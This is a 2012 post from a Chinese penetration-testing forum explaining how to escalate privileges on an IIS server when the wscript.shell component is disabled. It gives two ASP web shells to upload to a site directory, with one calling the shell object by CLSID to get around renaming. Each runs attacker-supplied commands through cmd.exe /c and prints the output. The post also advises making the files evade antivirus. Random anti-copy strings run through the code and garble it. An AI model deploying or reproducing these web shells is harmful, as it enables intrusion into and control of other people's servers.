中国网络渗透测试联盟
标题:
没有wscript.shell组件提权方法
[打印本页]
作者:
admin
时间:
2012-10-21 09:08
标题:
没有wscript.shell组件提权方法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
7 @8 o! d5 ~) ^4 @6 A
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
% y# J6 ], A) W# H' a! S
要想让运行命令可以试试这种方法,成功率为五五之数。
! ^/ u: j6 Z# f. P7 Y& y
把下面代码复制:
0 Y6 [9 v( O! v: B+ `4 Y
<%
( N! j( u1 t8 V
end if
( Y- H" P# d- e4 V, q/ i
response.write(”")
6 y* H2 P4 A; e7 O1 I' c
On Error Resume
}3 F9 q; D1 X
Next
& M0 c X9 { E+ v5 ]* i9 B! X: y
response.write oScriptlhn.exec(”cmd.exe /c” &
1 H1 n/ K' F* M% z; z/ f& R; j+ ]3 L
request(”c”)).stdout.readall
: z- I- [/ Q. ^6 T* J
response.write(”")
, I w2 ^ ]4 \/ f! f
response.write(”")
, }; @. V* l8 _4 ]% A9 _
response.write(”
$ C+ S' M* _5 B( T% x
“)
& O9 J( f0 W: k5 R8 k, |7 R
response.write(”")
3 M+ i8 B. \) ]; i! ]4 |
%>
0 P* C# l Q* |6 c8 c. p8 p: ]
保存为一个asp文件,然后传到网站目录上去
: o- ^. i/ v$ H D3 T* i8 G. n
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
1 Y; R, O+ i, q0 b1 M
我用此成功运行过cacls命令。
3 x4 y2 j% v, d7 d0 |
第二那就是运行时出错,可能限制某些代码执行
9 A. B$ n( |2 O& |% A5 K6 y
无wscript.shell组件提权又一个方法
* d: k# M1 G2 F, a2 n
<object runat=server id=oScriptlhn scope=page
( @" h; f2 s% h2 y6 I. n i$ X
% a4 Z( [$ U7 ?
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
% J D6 U K& L9 U/ g* j
<%if err then%>
& b4 ^0 w( {5 J1 o7 O$ n+ }
<object runat=server id=oScriptlhn scope=page
5 z* J4 o# C! n
. q8 G0 @* |% _4 S) w
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
- j0 `2 }9 L2 d
<%
3 `- N( s( N. w) ]3 L
end if
5 w) f8 J7 u- N; X$ a/ j
response.write(”<textarea readonly cols=80
; J S; H4 q# M3 K. g# ~5 A! [
2 L# Y, V. T+ q# A4 t
rows=20>”)
- [4 D" ^" D! P, o5 ^+ w" p; }
On Error Resume Next
" H8 T. p! k$ G3 i f; U1 q* S
response.write
+ P9 n# n/ I D
7 M* D/ {8 X) }7 {8 Z! V
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
2 O+ O$ i) y: O M
response.write(”</textarea>”)
* f1 k ~$ A! x! Q5 O* F
response.write(”<form
8 ?# K; X" }4 n O8 J0 ^, A! i
8 L+ R. F+ R6 ?2 v% B3 x
method=’post’>”)
4 l& b7 h# E1 B4 m
response.write(”<input type=text name=’c'
|% P# e: ]: A
/ m3 _0 w( z: b! O- @: d
size=60><br>”)
8 w" h- k5 ]; x5 N4 n; Y
response.write(”<input type=submit
& b9 @1 G) k! \% a
/ e9 v/ x# n$ o$ H( U0 R' U
value=’执行’></form>”)
' X! R" U; O+ F- v+ r: z( z5 R
%>
5 ?0 ^2 G2 s! u5 x; o
保存为ASP,此代码可能被杀,请注意免杀。
9 C, G8 X& C& D& S$ P+ J+ o- @
原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
2 z- Q _' a! f( K
复制代码
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2